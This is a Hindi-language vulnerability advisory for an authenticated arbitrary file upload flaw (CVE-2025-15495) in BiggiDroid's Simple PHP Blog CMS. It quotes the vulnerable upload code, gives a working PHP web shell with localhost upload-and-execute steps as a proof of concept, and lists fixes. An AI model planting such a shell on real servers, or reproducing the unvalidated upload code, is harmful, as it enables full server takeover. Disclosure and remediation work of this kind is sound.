
CVE-2025-15495 - मनमाना फ़ाइल अपलोड जिससे दूरस्थ कोड निष्पादन (RCE) होता है
BiggiDroid – Simple PHP Blog CMS उत्पाद पृष्ठ: https://biggidroid.com/product/simple-php-blog/
गंभीर (Critical)
CVSS (अनुमानित): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Simple PHP Blog CMS में प्रशासन पैनल की साइट लोगो अपलोड कार्यक्षमता में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता है। एक प्रमाणित हमलावर एक दुर्भावनापूर्ण PHP फ़ाइल को एक छवि के रूप में प्रच्छन्न करके अपलोड कर सकता है, जो वेब-सुलभ निर्देशिका में संग्रहीत होती है और सर्वर द्वारा निष्पादित की जाती है, जिसके परिणामस्वरूप रिमोट कमांड निष्पादन होता है।
प्रशासन पैनल → साइट लोगो अपडेट करें
प्रासंगिक कमजोर कोड स्निपेट:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
shell.php नामक एक फ़ाइल बनाएँ:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php अपलोड करें📌 एप्लिकेशन बिना सत्यापन के PHP फ़ाइल स्वीकार करता है
अपलोड करने के बाद, फ़ाइल इस पर उपलब्ध है:
http://127.0.0.1/image/shell.php
सिस्टम कमांड निष्पादित करें:
http://127.0.0.1/image/shell.php?cmd=dir
सर्वर OS कमांड निष्पादित करता है और आउटपुट लौटाता है, जो रिमोट कोड निष्पादन की पुष्टि करता है।





एक हमलावर यह कर सकता है:
यह भेद्यता पूर्ण सर्वर अधिग्रहण का कारण बन सकती है।
.htaccess / सर्वर हार्डनिंग नहींफ़ाइल एक्सटेंशन प्रतिबंधित करें
$allowed = ['jpg','jpeg','png','gif'];
MIME प्रकार मान्य करें
finfo_file()
अपलोड की गई फ़ाइलों का नाम बदलें